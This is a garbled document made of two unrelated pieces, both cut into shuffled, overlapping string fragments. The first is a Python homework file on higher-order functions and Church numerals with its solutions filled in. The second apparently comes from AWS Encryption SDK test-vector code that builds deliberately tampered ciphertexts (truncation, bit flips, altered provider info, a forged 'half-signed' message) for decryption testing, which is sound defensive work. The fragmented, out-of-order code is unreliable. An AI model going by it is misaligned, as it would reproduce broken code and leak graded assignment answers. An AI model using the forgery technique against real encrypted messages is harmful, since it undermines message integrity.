# Yes,", "the Church numeral for m + n, for Church numerals", ">>> product(3, triple) # 1*3 * 2*3 * 3*3 162", "# square(square(square(square(5)))) 152587890625 >>> make_repeater(square, 0)(5) # Yes, it makes", "be combined are f(1), f(2), ..., f(n). combiner is a", "result,k = h(result), k + 1 return result return repeater", "# 11 + 1^2 + 2^2 + 3^2 25 >>>", "return result def accumulate(combiner, base, n, f): \"\"\"Return the result", "YOUR CODE HERE ***\" return lambda f: m(n(f)) def pow_church(m,", "three = successor(two) def church_to_int(n): \"\"\"Convert the Church numeral n", ">>> summation_using_accumulate(5, triple) 45 >>> from construct_check import check >>>", "check >>> # ban iteration and recursion >>> check(HW_SOURCE_FILE, 'summation_using_accumulate',", "while k <= n: result,k = h(result), k + 1", "implementation uses accumulate. >>> summation_using_accumulate(5, square) 55 >>> summation_using_accumulate(5, triple)", "# 1 * 2 * 3 6 >>> product(5, identity)", "m + n, for Church numerals m and n. >>>", "* 5^2 14400 >>> product(3, increment) # (1+1) * (2+1)", "\"*** YOUR CODE HERE ***\" return n(lambda x: x +", "k <= n: result, k = combiner(result,f(k)), k + 1", "+ 1 return result return repeater ########################## # Just for", "... 
['Recursion', 'For', 'While']) True \"\"\" \"*** YOUR CODE HERE", "8 >>> church_to_int(pow_church(three, two)) 9 \"\"\" \"*** YOUR CODE HERE", "***\" result,k = 1,1 while k <= n: result,k =", "three)) 8 >>> church_to_int(pow_church(three, two)) 9 \"\"\" \"*** YOUR CODE", "1 return accumulate(add,0,n,f) def product_using_accumulate(n, f): \"\"\"An implementation of product", "church_to_int(pow_church(two, three)) 8 >>> church_to_int(pow_church(three, two)) 9 \"\"\" \"*** YOUR", "k = 0, 1 # while k <= n: #", "def church_to_int(n): \"\"\"Convert the Church numeral n to a Python", "5 \"\"\" \"*** YOUR CODE HERE ***\" def repeater(x): result,", ">>> church_to_int(three) 3 \"\"\" \"*** YOUR CODE HERE ***\" return", ">>> church_to_int(mul_church(two, three)) 6 >>> church_to_int(mul_church(three, four)) 12 \"\"\" \"***", "check >>> # ban iteration and recursion >>> check(HW_SOURCE_FILE, 'product_using_accumulate',", "CODE HERE ***\" result, k = base,1 while k <=", "result, k = result * f(k), k + 1 return", "positive integer f -- a function that takes one argument", "x: x triple = lambda x: 3 * x increment", "computes the nth application of h. >>> add_three = make_repeater(increment,", "+ 1 ###################### # Required Questions # ###################### def product(n,", "def accumulate(combiner, base, n, f): \"\"\"Return the result of combining", ">>> check(HW_SOURCE_FILE, 'summation_using_accumulate', ... ['Recursion', 'For', 'While']) True \"\"\" \"***", "\"\"\"Return the Church numeral m ** n, for Church numerals", "Higher Order Functions\"\"\" HW_SOURCE_FILE = 'hw02.py' from operator import add,", "x def successor(n): return lambda f: lambda x: f(n(f)(x)) def", "sub square = lambda x: x * x identity =", "f(n). combiner is a two-argument commutative, associative function. >>> accumulate(add,", "sense to apply the function zero times! 5 \"\"\" \"***", "lambda x: f(x) def two(f): \"\"\"Church numeral 2: same as", "terms in a sequence. n -- a positive integer f", "# Just for fun Questions # ########################## def zero(f): return", "11, 5, identity) # 11 + 1 + 2 +", "return result def summation_using_accumulate(n, f): \"\"\"Returns the sum of f(1)", "apply the function zero times! 5 \"\"\" \"*** YOUR CODE", "product_using_accumulate(6, triple) 524880 >>> from construct_check import check >>> #", "4^2 * 5^2 14400 >>> product(3, increment) # (1+1) *", "construct_check import check >>> # ban iteration and recursion >>>", "\"\"\" \"*** YOUR CODE HERE ***\" def repeater(x): result, k", "1, 2, 3, square) 19 >>> accumulate(lambda x, y: 2", "1: same as successor(zero)\"\"\" \"*** YOUR CODE HERE ***\" return", "church_to_int(three) 3 \"\"\" \"*** YOUR CODE HERE ***\" return n(lambda", "..., f(n). combiner is a two-argument commutative, associative function. >>>", "y: x + y + 1, 2, 3, square) 19", "HERE ***\" return lambda x: f(f(x)) three = successor(two) def", "result, k = 0, 1 # while k <= n:", "HERE ***\" def repeater(x): result, k = x,1 while k", "+ 5 15 >>> accumulate(add, 11, 5, identity) # 11", "+ f(k), k + 1 return accumulate(add,0,n,f) def product_using_accumulate(n, f):", "1 return result return repeater ########################## # Just for fun", "product(3, identity) # 1 * 2 * 3 6 >>>", "3 * 4 * 5 120 >>> product(3, square) #", "Order Functions\"\"\" HW_SOURCE_FILE = 'hw02.py' from operator import add, mul,", "a Python integer. >>> church_to_int(zero) 0 >>> church_to_int(one) 1 >>>", "numeral m ** n, for Church numerals m and n.", "sum of f(1) + ... + f(n). 
The implementation uses", ">>> product(5, identity) # 1 * 2 * 3 *", "identity) # 11 + 1 + 2 + 3 +", "# result, k = 0, 1 # while k <=", "* (3+1) 24 >>> product(3, triple) # 1*3 * 2*3", "= successor(three) >>> church_to_int(mul_church(two, three)) 6 >>> church_to_int(mul_church(three, four)) 12", "# ban iteration and recursion >>> check(HW_SOURCE_FILE, 'product_using_accumulate', ... ['Recursion',", "two)) 9 \"\"\" \"*** YOUR CODE HERE ***\" return n(m)", "# ban iteration and recursion >>> check(HW_SOURCE_FILE, 'summation_using_accumulate', ... ['Recursion',", "1 + 2 + 3 + 4 + 5 26", "n: result,k = h(result), k + 1 return result return", "it makes sense to apply the function zero times! 5", "n -- a positive integer f -- a function that", "y + 1, 2, 3, square) 19 >>> accumulate(lambda x,", "three)) 6 >>> church_to_int(mul_church(three, four)) 12 \"\"\" \"*** YOUR CODE", "m and n. >>> four = successor(three) >>> church_to_int(mul_church(two, three))", "+ ... + f(n). The implementation uses accumulate. >>> summation_using_accumulate(5,", "zero(f): return lambda x: x def successor(n): return lambda f:", "'product_using_accumulate', ... ['Recursion', 'For', 'While']) True \"\"\" \"*** YOUR CODE", "HERE ***\" result,k = 1,1 while k <= n: result,k", "square = lambda x: x * x identity = lambda", "+ 1 return result def accumulate(combiner, base, n, f): \"\"\"Return", "m * n, for Church numerals m and n. >>>", "result, k = result + f(k), k + 1 return", "= lambda x: x * x identity = lambda x:", "k + 1 return result def accumulate(combiner, base, n, f):", "the product of the first n terms in a sequence.", "terms to be combined are f(1), f(2), ..., f(n). combiner", "2, 3, square) 19 >>> accumulate(lambda x, y: 2 *", "# 2 * 1^2 * 2^2 * 3^2 72 >>>", "# 1^2 * 2^2 * 3^2 * 4^2 * 5^2", "3, square) 19 >>> accumulate(lambda x, y: 2 * (x", "Church numerals m and n. >>> church_to_int(pow_church(two, three)) 8 >>>", "church_to_int(zero) 0 >>> church_to_int(one) 1 >>> church_to_int(two) 2 >>> church_to_int(three)", "1 * 2 * 3 * 4 * 5 120", "f(1), f(2), ..., f(n). combiner is a two-argument commutative, associative", "accumulate(add,0,n,f) def product_using_accumulate(n, f): \"\"\"An implementation of product using accumulate.", "f(k), k + 1 return accumulate(mul,1,n,f) def compose1(h, g): \"\"\"Return", "square(square(5)) 625 >>> make_repeater(square, 4)(5) # square(square(square(square(5)))) 152587890625 >>> make_repeater(square,", "HW_SOURCE_FILE = 'hw02.py' from operator import add, mul, sub square", "= h(result), k + 1 return result return repeater ##########################", "integer. >>> church_to_int(zero) 0 >>> church_to_int(one) 1 >>> church_to_int(two) 2", "3 * x increment = lambda x: x + 1", "x: x * x identity = lambda x: x triple", "def pow_church(m, n): \"\"\"Return the Church numeral m ** n,", "the Church numeral n to a Python integer. >>> church_to_int(zero)", "['Recursion', 'For', 'While']) True \"\"\" \"*** YOUR CODE HERE ***\"", "makes sense to apply the function zero times! 5 \"\"\"", ">>> church_to_int(pow_church(two, three)) 8 >>> church_to_int(pow_church(three, two)) 9 \"\"\" \"***", "of product using accumulate. 
>>> product_using_accumulate(4, square) 576 >>> product_using_accumulate(6,", "HERE ***\" return lambda f: lambda x: m(f)(n(f)(x)) def mul_church(m,", "# result, k = result * f(k), k + 1", "product_using_accumulate(4, square) 576 >>> product_using_accumulate(6, triple) 524880 >>> from construct_check", "the Church numeral m ** n, for Church numerals m", "return lambda x: f(f(x)) three = successor(two) def church_to_int(n): \"\"\"Convert", "def mul_church(m, n): \"\"\"Return the Church numeral for m *", ">>> product(5, square) # 1^2 * 2^2 * 3^2 *", "from operator import add, mul, sub square = lambda x:", "CODE HERE ***\" return lambda x: f(x) def two(f): \"\"\"Church", "(x + y), 2, 3, square) 58 >>> accumulate(lambda x,", "two-argument commutative, associative function. >>> accumulate(add, 0, 5, identity) #", "162 \"\"\" \"*** YOUR CODE HERE ***\" result,k = 1,1", "for m * n, for Church numerals m and n.", "<= n: # result, k = result + f(k), k", "\"\"\" \"*** YOUR CODE HERE ***\" return lambda f: m(n(f))", "result, k = combiner(result,f(k)), k + 1 return result def", "operator import add, mul, sub square = lambda x: x", "add, mul, sub square = lambda x: x * x", "square) # 11 + 1^2 + 2^2 + 3^2 25", "3 * 1 243 >>> make_repeater(square, 2)(5) # square(square(5)) 625", "k = x,1 while k <= n: result,k = h(result),", "YOUR CODE HERE ***\" return n(lambda x: x + 1)(0)", "+ 3 + 4 + 5 15 >>> accumulate(add, 11,", "x: x + 1 ###################### # Required Questions # ######################", "square(square(square(square(5)))) 152587890625 >>> make_repeater(square, 0)(5) # Yes, it makes sense", "of h. >>> add_three = make_repeater(increment, 3) >>> add_three(5) 8", "n terms in a sequence. n -- a positive integer", "def zero(f): return lambda x: x def successor(n): return lambda", "while k <= n: result,k = f(k)*result, k + 1", "+ 3 + 4 + 5 26 >>> accumulate(add, 11,", "while k <= n: result, k = combiner(result,f(k)), k +", "3 * 3 * 3 * 3 * 1 243", "HERE ***\" return n(lambda x: x + 1)(0) def add_church(m,", "one(f): \"\"\"Church numeral 1: same as successor(zero)\"\"\" \"*** YOUR CODE", "h(result), k + 1 return result return repeater ########################## #", "product using accumulate. >>> product_using_accumulate(4, square) 576 >>> product_using_accumulate(6, triple)", "accumulate(add, 11, 0, identity) # 11 11 >>> accumulate(add, 11,", "* 1^2 * 2^2 * 3^2 72 >>> accumulate(lambda x,", "***\" return n(lambda x: x + 1)(0) def add_church(m, n):", "while k <= n: # result, k = result *", "* (x + y), 2, 3, square) 58 >>> accumulate(lambda", "1 + 2 + 3 + 4 + 5 15", "that takes one argument to produce the term >>> product(3,", "identity) # 11 11 >>> accumulate(add, 11, 3, square) #", "product(3, increment) # (1+1) * (2+1) * (3+1) 24 >>>", "result,k = 1,1 while k <= n: result,k = f(k)*result,", "* 2^2 * 3^2 72 >>> accumulate(lambda x, y: x", "argument to produce the term >>> product(3, identity) # 1", "f(k)*result, k + 1 return result def accumulate(combiner, base, n,", "YOUR CODE HERE ***\" result, k = base,1 while k", "(2+1) * (3+1) 24 >>> product(3, triple) # 1*3 *", "'summation_using_accumulate', ... ['Recursion', 'For', 'While']) True \"\"\" \"*** YOUR CODE", "iteration and recursion >>> check(HW_SOURCE_FILE, 'product_using_accumulate', ... 
def summation_using_accumulate(n, f):
    """Returns the sum of f(1) + ... + f(n).
    The implementation uses accumulate.

    >>> summation_using_accumulate(5, square)
    55
    >>> summation_using_accumulate(5, triple)
    45
    >>> from construct_check import check
    >>> # ban iteration and recursion
    >>> check(HW_SOURCE_FILE, 'summation_using_accumulate',
    ...       ['Recursion', 'For', 'While'])
    True
    """
    "*** YOUR CODE HERE ***"
    # result, k = 0, 1
    # while k <= n:
    #     result, k = result + f(k), k + 1
    return accumulate(add, 0, n, f)


def product_using_accumulate(n, f):
    """An implementation of product using accumulate.

    >>> product_using_accumulate(4, square)
    576
    >>> product_using_accumulate(6, triple)
    524880
    >>> from construct_check import check
    >>> # ban iteration and recursion
    >>> check(HW_SOURCE_FILE, 'product_using_accumulate',
    ...       ['Recursion', 'For', 'While'])
    True
    """
    "*** YOUR CODE HERE ***"
    # result, k = 1, 1
    # while k <= n:
    #     result, k = result * f(k), k + 1
    return accumulate(mul, 1, n, f)
def compose1(h, g):
    """Return a function f, such that f(x) = h(g(x))."""
    def f(x):
        return h(g(x))
    return f


def make_repeater(h, n):
    """Return the function that computes the nth application of h.

    >>> add_three = make_repeater(increment, 3)
    >>> add_three(5)
    8
    >>> make_repeater(triple, 5)(1)  # 3 * 3 * 3 * 3 * 3 * 1
    243
    >>> make_repeater(square, 2)(5)  # square(square(5))
    625
    >>> make_repeater(square, 4)(5)  # square(square(square(square(5))))
    152587890625
    >>> make_repeater(square, 0)(5)  # Yes, it makes sense to apply the function zero times!
    5
    """
    "*** YOUR CODE HERE ***"
    def repeater(x):
        result, k = x, 1
        while k <= n:
            result, k = h(result), k + 1
        return result
    return repeater
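# Aside (a sketch, not part of the assignment solution): repeated application
# is n-fold self-composition, so make_repeater can also be expressed with
# accumulate, using compose1 as the combiner and identity as the base.
def make_repeater_using_accumulate(h, n):
    return accumulate(compose1, identity, n, lambda k: h)


assert make_repeater_using_accumulate(increment, 3)(5) == 8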
5 \"\"\" \"*** YOUR CODE HERE", "5^2 14400 >>> product(3, increment) # (1+1) * (2+1) *", "# 0 + 1 + 2 + 3 + 4", "y: (x + y) % 17, 19, 20, square) 16", "3 \"\"\" \"*** YOUR CODE HERE ***\" return n(lambda x:", "* 4 * 5 120 >>> product(3, square) # 1^2", "square) 58 >>> accumulate(lambda x, y: (x + y) %", "product(5, identity) # 1 * 2 * 3 * 4", "the nth application of h. >>> add_three = make_repeater(increment, 3)", "+ 1^2 + 2^2 + 3^2 25 >>> accumulate(mul, 2,", "1*3 * 2*3 * 3*3 162 \"\"\" \"*** YOUR CODE", "\"\"\"Return the function that computes the nth application of h.", "\"\"\"Return a function f, such that f(x) = h(g(x)).\"\"\" def", "# 1^2 * 2^2 * 3^2 36 >>> product(5, square)", "3, square) # 11 + 1^2 + 2^2 + 3^2", "y) % 17, 19, 20, square) 16 \"\"\" \"*** YOUR", "def repeater(x): result, k = x,1 while k <= n:", "increment = lambda x: x + 1 ###################### # Required", ">>> church_to_int(add_church(two, three)) 5 \"\"\" \"*** YOUR CODE HERE ***\"", ">>> accumulate(lambda x, y: (x + y) % 17, 19,", "triple) # 1*3 * 2*3 * 3*3 162 \"\"\" \"***", "return repeater ########################## # Just for fun Questions # ##########################", "f: m(n(f)) def pow_church(m, n): \"\"\"Return the Church numeral m", "\"*** YOUR CODE HERE ***\" def repeater(x): result, k =", "is a two-argument commutative, associative function. >>> accumulate(add, 0, 5,", "h. >>> add_three = make_repeater(increment, 3) >>> add_three(5) 8 >>>", "make_repeater(square, 0)(5) # Yes, it makes sense to apply the", "* 2*3 * 3*3 162 \"\"\" \"*** YOUR CODE HERE", "= make_repeater(increment, 3) >>> add_three(5) 8 >>> make_repeater(triple, 5)(1) #", ">>> product(3, square) # 1^2 * 2^2 * 3^2 36", "x + 1 ###################### # Required Questions # ###################### def", "17, 19, 20, square) 16 \"\"\" \"*** YOUR CODE HERE", "# Yes, it makes sense to apply the function zero", "same as successor(successor(zero))\"\"\" \"*** YOUR CODE HERE ***\" return lambda", "a positive integer f -- a function that takes one", "three)) 5 \"\"\" \"*** YOUR CODE HERE ***\" return lambda", "for m + n, for Church numerals m and n.", "x identity = lambda x: x triple = lambda x:", "k = result + f(k), k + 1 return accumulate(add,0,n,f)", "four)) 12 \"\"\" \"*** YOUR CODE HERE ***\" return lambda", "to produce the term >>> product(3, identity) # 1 *", "to apply the function zero times! 5 \"\"\" \"*** YOUR", "\"\"\"Returns the sum of f(1) + ... + f(n). The", "= lambda x: x triple = lambda x: 3 *", "result, k = x,1 while k <= n: result,k =", "########################## # Just for fun Questions # ########################## def zero(f):", "numeral for m * n, for Church numerals m and", "6 >>> church_to_int(mul_church(three, four)) 12 \"\"\" \"*** YOUR CODE HERE", "compose1(h, g): \"\"\"Return a function f, such that f(x) =", "k + 1 return result def summation_using_accumulate(n, f): \"\"\"Returns the", "y: 2 * (x + y), 2, 3, square) 58", "for fun Questions # ########################## def zero(f): return lambda x:", "***\" return lambda f: lambda x: m(f)(n(f)(x)) def mul_church(m, n):", "= successor(two) def church_to_int(n): \"\"\"Convert the Church numeral n to", "Just for fun Questions # ########################## def zero(f): return lambda", "f(x) = h(g(x)).\"\"\" def f(x): return h(g(x)) return f def", "2*3 * 3*3 162 \"\"\" \"*** YOUR CODE HERE ***\"", "+ 4 + 5 15 >>> accumulate(add, 11, 5, identity)", "accumulate(mul, 2, 3, square) # 2 * 1^2 * 2^2", "commutative, associative function. 
def add_church(m, n):
    """Return the Church numeral for m + n, for Church numerals m and n.

    >>> church_to_int(add_church(two, three))
    5
    """
    "*** YOUR CODE HERE ***"
    return lambda f: lambda x: m(f)(n(f)(x))


def mul_church(m, n):
    """Return the Church numeral for m * n, for Church numerals m and n.

    >>> four = successor(three)
    >>> church_to_int(mul_church(two, three))
    6
    >>> church_to_int(mul_church(three, four))
    12
    """
    "*** YOUR CODE HERE ***"
    return lambda f: m(n(f))


def pow_church(m, n):
    """Return the Church numeral m ** n, for Church numerals m and n.

    >>> church_to_int(pow_church(two, three))
    8
    >>> church_to_int(pow_church(three, two))
    9
    """
    "*** YOUR CODE HERE ***"
    return n(m)
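# Why pow_church is just n(m) (a sketch): m is itself an "apply-f m times"
# operator, so applying m to itself n times at the function level yields an
# "apply-f m**n times" operator. A quick illustrative check:
assert church_to_int(pow_church(two, two)) == 4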
[ "generates materials for an unsigned algorithm suite that includes the", "self.plaintexts.items()} ciphertext_writer = file_writer(os.path.join(root_dir, \"ciphertexts\")) test_scenarios = { decrypt_scenario_name: decrypt_scenario", "bit_index = divmod(bit, BITS_PER_BYTE) result = bytearray(ciphertext) result[byte_index] ^= 1", "every time. cache = LocalCryptoMaterialsCache(10) caching_cmm = CachingCryptoMaterialsManager( master_key_provider=master_key_provider, cache=cache,", "on the given master key provider. \"\"\" self.wrapped_default_cmm = DefaultCryptoMaterialsManager(master_key_provider)", "need these imports when running the mypy checks pass SUPPORTED_VERSIONS", "attr.ib(validator=attr.validators.instance_of(KeysManifest)) plaintexts = attr.ib(validator=dictionary_validator(six.string_types, six.binary_type)) tests = attr.ib(validator=dictionary_validator(six.string_types, MessageDecryptionTestScenarioGenerator)) type_name", "result def decrypt_materials(self, request): \"\"\"Thunks to the wrapped CMM\"\"\" return", "tag: \" + tampering_tag) # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer,", "for the specific # language governing permissions and limitations under", "else None return cls( encryption_scenario=encryption_scenario, tampering_method=tampering_method, decryption_method=decryption_method, decryption_master_key_specs=decryption_master_key_specs, decryption_master_key_provider_fn=decryption_master_key_provider_fn, result=result,", "the provider info field on EDKS. THIS IS ONLY USED", "target_directory, json_indent=None): # type: (str, Optional[int]) -> None \"\"\"Process all", ") for length in range(1, len(ciphertext_to_decrypt)) ] class HalfSigningTamperingMethod(TamperingMethod): \"\"\"Tampering", "from typing import IO, Callable, Dict, Iterable, Optional # noqa", "== \"mutate\": return MutateTamperingMethod() if spec == \"half-sign\": return HalfSigningTamperingMethod()", "os.path.abspath(target_directory) root_writer = file_writer(root_dir) root_writer(\"keys.json\", json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING)) plaintext_writer = file_writer(os.path.join(root_dir,", "scenario specification. :param dict scenario: Scenario specification JSON :param KeysManifest", "type_name=cls.type_name, manifest_version=raw_manifest[\"manifest\"], supported_versions=SUPPORTED_VERSIONS ) parent_dir = os.path.abspath(os.path.dirname(input_file.name)) reader = file_reader(parent_dir)", "signing_request = copy(request) signing_request.algorithm = AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY_ECDSA_P384 result = self.wrapped_default_cmm.get_encryption_materials(signing_request) result.algorithm", "plaintexts=plaintexts ) except NotImplementedError: continue return cls(version=raw_manifest[\"manifest\"][\"version\"], keys=keys, plaintexts=plaintexts, tests=tests)", "keys=keys, plaintexts=plaintexts, tests=tests) def run_and_write_to_dir(self, target_directory, json_indent=None): # type: (str,", "plaintext_writer = file_writer(os.path.join(root_dir, \"plaintexts\")) plaintext_uris = {name: plaintext_writer(name, plaintext) for", "permissions and limitations under the License. \"\"\" AWS Encryption SDK", "ANY KIND, either express or implied. 
class TamperingMethod:
    """Base class for all tampering methods."""

    @classmethod
    def from_tampering_spec(cls, spec):
        """Load from a tampering specification"""
        if spec is None:
            return TamperingMethod()
        if spec == "truncate":
            return TruncateTamperingMethod()
        if spec == "mutate":
            return MutateTamperingMethod()
        if spec == "half-sign":
            return HalfSigningTamperingMethod()
        ((tampering_tag, tampering_values_spec),) = spec.items()
        if tampering_tag == "change-edk-provider-info":
            return ChangeEDKProviderInfoTamperingMethod.from_values_spec(tampering_values_spec)
        raise ValueError("Unrecognized tampering method tag: " + tampering_tag)

    # pylint: disable=R0201
    def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, plaintext_uri):
        """
        Run a given scenario, tampering with the input or the result.

        return: a list of (ciphertext, result) pairs
        """
        materials_manager = DefaultCryptoMaterialsManager(
            generation_scenario.encryption_scenario.master_key_provider_fn()
        )
        ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(materials_manager)
        if generation_scenario.result:
            expected_result = generation_scenario.result
        else:
            expected_result = MessageDecryptionTestResult.expect_output(
                plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext
            )
        return [
            generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result)
        ]
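# Illustrative dispatch table for from_tampering_spec (spec values as they
# appear in a generation manifest):
#
#     None                                    -> TamperingMethod (no tampering)
#     "truncate"                              -> TruncateTamperingMethod
#     "mutate"                                -> MutateTamperingMethod
#     "half-sign"                             -> HalfSigningTamperingMethod
#     {"change-edk-provider-info": [infos]}   -> ChangeEDKProviderInfoTamperingMethod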
class ChangeEDKProviderInfoTamperingMethod(TamperingMethod):
    """Tampering method that changes the provider info on all EDKs."""

    new_provider_infos = attr.ib(validator=iterable_validator(list, six.string_types))

    def __init__(self, new_provider_infos):
        """Create a new instance for a given new provider info value."""
        self.new_provider_infos = new_provider_infos

    @classmethod
    def from_values_spec(cls, values_spec):
        """Load from a tampering parameters specification"""
        return ChangeEDKProviderInfoTamperingMethod(values_spec)

    # pylint: disable=R0201
    def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):
        """
        Run a given scenario, tampering with the input or the result.

        return: a list of (ciphertext, result) pairs.
        """
        master_key_provider = generation_scenario.encryption_scenario.master_key_provider_fn()
        # Use a caching CMM to avoid generating a new data key every time.
        cache = LocalCryptoMaterialsCache(10)
        caching_cmm = CachingCryptoMaterialsManager(
            master_key_provider=master_key_provider,
            cache=cache,
            max_age=60.0,
            max_messages_encrypted=100,
        )
        return [
            self.run_scenario_with_new_provider_info(ciphertext_writer, generation_scenario, caching_cmm, new_provider_info)
            for new_provider_info in self.new_provider_infos
        ]

    def run_scenario_with_new_provider_info(self, ciphertext_writer, generation_scenario, materials_manager, new_provider_info):
        """Run with tampering for a specific new provider info value"""
        tampering_materials_manager = ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info)
        ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager)
        expected_result = MessageDecryptionTestResult.expect_error(
            "Incorrect encrypted data key provider info: " + new_provider_info
        )
        return generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result)
\"\"\" master_key_provider = generation_scenario.encryption_scenario.master_key_provider_fn() # Use", "attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) def __init__(self, master_key_provider): \"\"\" Create a new CMM that", "suite.\" ) def decrypt_materials(self, request): \"\"\"Thunks to the wrapped default", "pass SUPPORTED_VERSIONS = (2,) class TamperingMethod: \"\"\"Base class for all", ":param dict scenario: Scenario specification JSON :param KeysManifest keys: Loaded", "name to randomly generated bytes :rtype: dict \"\"\" return {name:", "value\"\"\" tampering_materials_manager = ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result =", ") ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(materials_manager) if generation_scenario.result: expected_result = generation_scenario.result else:", "class MessageDecryptionGenerationManifest(object): \"\"\"AWS Encryption SDK Decryption Message Generation manifest handler.", "a tampering specification\"\"\" if spec is None: return TamperingMethod() if", "all known encrypt test scenarios and write the resulting data", ":param dict plaintexts_specs: Mapping of plaintext name to size in", "for bit in range(0, len(ciphertext_to_decrypt) * BITS_PER_BYTE) ] @classmethod def", "\"\"\"Flip only the given bit in the given ciphertext\"\"\" byte_index,", "a list of (ciphertext, result) pairs. \"\"\" tampering_materials_manager = HalfSigningCryptoMaterialsManager(", "DefaultCryptoMaterialsManager(master_key_provider) def get_encryption_materials(self, request): \"\"\" Generate half-signing materials by requesting", "names to :class:`MessageDecryptionGenerationManifest`s \"\"\" version = attr.ib(validator=membership_validator(SUPPORTED_VERSIONS)) keys = attr.ib(validator=attr.validators.instance_of(KeysManifest))", "specifications :type decryption_master_key_specs: iterable of :class:`MasterKeySpec` :param Callable decryption_master_key_provider_fn: :param", "Iterable, Optional # noqa pylint: disable=unused-import from awses_test_vectors.internal.mypy_types import (", "attr.ib(validator=attr.validators.optional(attr.validators.instance_of(TamperingMethod))) decryption_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(DecryptionMethod))) decryption_master_key_specs = attr.ib(validator=iterable_validator(list, MasterKeySpec)) decryption_master_key_provider_fn =", "generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM that", "All Rights Reserved. 
BITS_PER_BYTE = 8


class TruncateTamperingMethod(TamperingMethod):
    """Tampering method that truncates a good message at every byte (except zero)."""

    # pylint: disable=R0201
    def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):
        """
        Run a given scenario, tampering with the input or the result.

        return: a list of (ciphertext, result) pairs.
        """
        ciphertext_to_decrypt = generation_scenario.encryption_scenario.run()
        return [
            generation_scenario.decryption_test_scenario_pair(
                ciphertext_writer,
                ciphertext_to_decrypt[0:length],
                MessageDecryptionTestResult.expect_error("Truncated at byte {}".format(length)),
            )
            for length in range(1, len(ciphertext_to_decrypt))
        ]
class MutateTamperingMethod(TamperingMethod):
    """Tampering method that produces a message with a single bit flipped, for every possible bit."""

    # pylint: disable=R0201
    def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):
        """
        Run a given scenario, tampering with the input or the result.

        return: a list of (ciphertext, result) pairs.
        """
        ciphertext_to_decrypt = generation_scenario.encryption_scenario.run()
        return [
            generation_scenario.decryption_test_scenario_pair(
                ciphertext_writer,
                MutateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit),
                MessageDecryptionTestResult.expect_error("Bit {} flipped".format(bit)),
            )
            for bit in range(0, len(ciphertext_to_decrypt) * BITS_PER_BYTE)
        ]

    @classmethod
    def flip_bit(cls, ciphertext, bit):
        """Flip only the given bit in the given ciphertext"""
        byte_index, bit_index = divmod(bit, BITS_PER_BYTE)
        result = bytearray(ciphertext)
        result[byte_index] ^= 1 << (BITS_PER_BYTE - bit_index - 1)
        return bytes(result)
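# Worked example for flip_bit (illustrative): bit indices count from the most
# significant bit of byte 0, so bit 0 maps to mask 0b1000_0000 of byte 0 and
# bit 15 to mask 0b0000_0001 of byte 1.
assert MutateTamperingMethod.flip_bit(b"\x00\x00", 0) == b"\x80\x00"
assert MutateTamperingMethod.flip_bit(b"\x00\x00", 15) == b"\x00\x01"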
class HalfSigningTamperingMethod(TamperingMethod):
    """Tampering method that produces an unsigned message which still carries the
    "aws-crypto-public-key" encryption context entry."""

    # pylint: disable=R0201
    def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):
        """
        Run a given scenario, tampering with the input or the result.

        return: a list of (ciphertext, result) pairs.
        """
        tampering_materials_manager = HalfSigningCryptoMaterialsManager(
            generation_scenario.encryption_scenario.master_key_provider_fn()
        )
        ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager)
        expected_result = MessageDecryptionTestResult.expect_error(
            "Unsigned message using a data key with a public key"
        )
        return [
            generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result)
        ]
class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager):
    """
    Custom CMM that generates materials for an unsigned algorithm suite that includes
    the "aws-crypto-public-key" encryption context.

    THIS IS ONLY USED TO CREATE INVALID MESSAGES and should never be used in production!

    It is imitating what a malicious decryptor without encryption permissions might do,
    to attempt to forge an unsigned message from a decrypted signed message, and
    therefore this is an important case for ESDKs to reject.
    """

    wrapped_default_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager))

    def __init__(self, master_key_provider):
        """
        Create a new CMM that wraps a new DefaultCryptoMaterialsManager
        based on the given master key provider.
        """
        self.wrapped_default_cmm = DefaultCryptoMaterialsManager(master_key_provider)

    def get_encryption_materials(self, request):
        """
        Generate half-signing materials by requesting signing materials
        from the wrapped default CMM, and then changing the algorithm suite
        and removing the signing key from the result.
        """
        if request.algorithm == AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY:
            signing_request = copy(request)
            signing_request.algorithm = AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY_ECDSA_P384

            result = self.wrapped_default_cmm.get_encryption_materials(signing_request)
            result.algorithm = request.algorithm
            result.signing_key = None

            return result

        raise NotImplementedError(
            "The half-sign tampering method is only supported on the "
            "AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm suite."
        )

    def decrypt_materials(self, request):
        """Thunks to the wrapped default CMM"""
        return self.wrapped_default_cmm.decrypt_materials(request)
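# Note on the mechanism above (a sketch of the resulting materials): the
# returned materials advertise the unsigned committing suite, but because they
# were generated for the signing suite they still carry the
# "aws-crypto-public-key" encryption context entry. That inconsistency is
# exactly what decrypting ESDKs are expected to detect and reject.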
